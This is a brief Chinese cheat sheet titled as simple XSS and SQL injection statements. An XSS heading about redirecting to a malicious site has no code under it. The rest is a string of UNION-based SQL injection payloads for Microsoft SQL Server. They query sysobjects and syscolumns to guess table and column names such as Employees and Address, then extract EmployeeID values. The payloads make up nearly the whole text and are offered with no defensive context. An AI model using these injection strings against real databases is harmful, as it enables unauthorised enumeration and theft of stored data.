简单的XSS与SQL注入语句
跳转至恶意站点
猜表名' union select name from sysobjects where xtype='U' --' union select name from sysobjects where xtype='U'and name > 'Categories' --' union select name from syscolumns where id = OBJECT_ID('Employees') and name>'Address'--' union select EmployeeID from Employees --
